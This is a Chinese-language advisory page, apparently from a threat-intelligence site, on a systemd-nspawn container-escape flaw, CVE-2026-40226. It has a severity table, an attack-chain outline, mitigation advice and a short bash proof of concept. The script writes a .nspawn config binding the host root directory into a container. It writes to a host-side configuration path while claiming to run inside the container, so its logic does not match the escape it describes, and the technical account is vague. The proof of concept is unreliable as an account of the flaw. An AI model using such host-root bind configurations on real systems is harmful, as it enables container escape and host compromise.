CVE-2026-40226 CVSS 6.4 中危

CVE-2026-40226 systemd nspawn容器逃逸漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40226

漏洞类型

容器逃逸

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

systemd

漏洞概述

systemd nspawn组件存在安全漏洞，影响版本233至259。攻击者若具备容器内高权限，可通过精心制作的配置文件触发逃逸至宿主机的操作。尽管攻击复杂度较高，但成功利用将导致宿主机机密性、完整性和可用性受损，系统面临完全被控的风险。

技术细节

该漏洞源于 systemd-nspawn 在解析和处理容器可选配置文件时的逻辑缺陷。systemd-nspawn 是一个用于运行轻量级容器的工具，它通过特定的配置文件（如 .nspawn 文件）来定义容器的资源限制、网络设置及文件系统挂载点。在受影响的版本中，当处理这些配置文件时，程序未能充分验证挂载路径或参数的合法性，导致路径遍历或非法挂载。
攻击者若已拥有容器内的高权限（root），可以创建或修改特定的配置文件。通过精心构造配置文件中的挂载参数（例如利用 Bind Mount 绑定挂载），攻击者可以诱导 nspawn 进程将宿主机的敏感目录（如根目录 /、/etc 或 /root）以读写权限挂载到容器内部。这使得攻击者能够突破容器的隔离边界，直接读写宿主机文件系统，从而实现从容器到宿主机的完整逃逸，获取宿主机的完全控制权。

攻击链分析

STEP 1

Initial Access

攻击者获取对目标容器的访问权限。

STEP 2

Privilege Escalation

攻击者在容器内提升至 root 权限，满足 PR:H 要求。

STEP 3

Craft Config

攻击者创建或修改精心制作的 .nspawn 配置文件，植入恶意挂载参数。

STEP 4

Trigger Vulnerability

等待或触发 systemd-nspawn 重新加载配置文件，解析恶意参数。

STEP 5

Escape

nspawn 执行挂载操作，将宿主机目录挂载进容器，攻击者访问宿主机文件系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-40226: systemd-nspawn Container Escape
# This script demonstrates a crafted config file scenario.
# Requirement: High privileges (root) inside the container.

CONFIG_FILE="/etc/systemd/nspawn/container.nspawn"

# Create a malicious configuration file
# Exploiting the optional config file handling to bind mount host root
echo "[Files]" > $CONFIG_FILE
echo "Bind=/:/mnt/host" >> $CONFIG_FILE

echo "Malicious config created at $CONFIG_FILE"
echo "Exploit attempts to bind mount host root to /mnt/host"

影响范围

systemd 233 - 259

防御指南

临时缓解措施

如果无法立即升级，应严格限制容器内 root 用户的权限，并禁止普通用户修改 systemd-nspawn 的配置文件路径。同时，监控宿主机上由 nspawn 进程发起的异常挂载行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表